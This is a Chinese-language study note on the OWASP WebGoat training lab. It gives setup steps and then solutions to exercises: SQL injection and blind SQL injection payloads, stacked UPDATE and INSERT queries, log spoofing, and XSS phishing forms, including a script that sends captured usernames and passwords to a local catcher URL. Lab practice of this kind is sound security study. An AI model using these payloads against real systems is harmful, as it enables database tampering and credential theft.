2020.07.16 實作練習

# 2020.07.16 實作練習 #### 安裝Java https://java.com/zh_TW/download/manual.jsp #### 設定環境變數 C:\Program Files\Java\jre1.8.0_261\bin #### 下載Webgoat https://owasp.org/www-project-webgoat/ https://github.com/WebGoat/WebGoat/releases?after=v8.0.0.M4 #### 啟動Webgoat 將檔案放到C:/WebGoat java -jar C:/WebGoat/webgoat-container-7.1-exec.jar http://localhost:8080/WebGoat/ guest/guest ### 題目一 Injection Flaws > Numeric SQL Injection &station = 102 or 1=1 ### 題目二 Injection Flaws > String SQL Injection Smith' or '1'='1 ### 題目三 Hint:salaries [Update] ``` Smith' ; Update salaries set salary = 1000000 where userid = 'jsmith';SELECT * from salaries where '1' = '1 ``` [Insert] ``` Smith' ; Insert Into salaries (userid,salary) values ('hello', 200);SELECT * from salaries where '1' = '1 ``` Insert Update Delete Alter #### 額外補充 1 Log Spoofing 123 Login succeed for username: admin #### 額外補充 2 Blind Numeric SQL Injection 101 AND ( ( SELECT pin FROM pins WHERE cc_number=1111222233334444 ) >1000 ) #### 額外補充 3 Blind String SQL Injection 101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' ); ### 題目四 XSS > Phishing with XSS (Reflected XSS) ``` <script>alert('hacked')</script> ``` ### 題目五 XSS > Stored XSS Attacks ``` <script>alert('hacked')</script> ``` ### 題目六 XSS > Phishing with XSS (Reflected XSS) ``` <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> ``` ``` <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google"> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> ``` ``` <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google"> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <script> function hack() { var username = document.loginform.user.value; var password = document.loginform.pass.value; alert("Your credentials were just stolen.\nUser:"+ username+"\nPassword="+password); XSSImage=new Image; XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user="+username+"&password="+password; } </script> ``` ``` <form> <br><br><HR> <H3>This feature requires account login:</H3> <br><br> <img src="https://www.google.com/images/branding/googlelogo/2x/googlelogo_color_92x30dp.png" alt="google"> <br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> <input type="submit" name="login" value="login" onclick="hack()"> </form> <script> function hack() { var username = document.loginform.user.value; var password = document.loginform.pass.value; alert("hack"); } </script> ```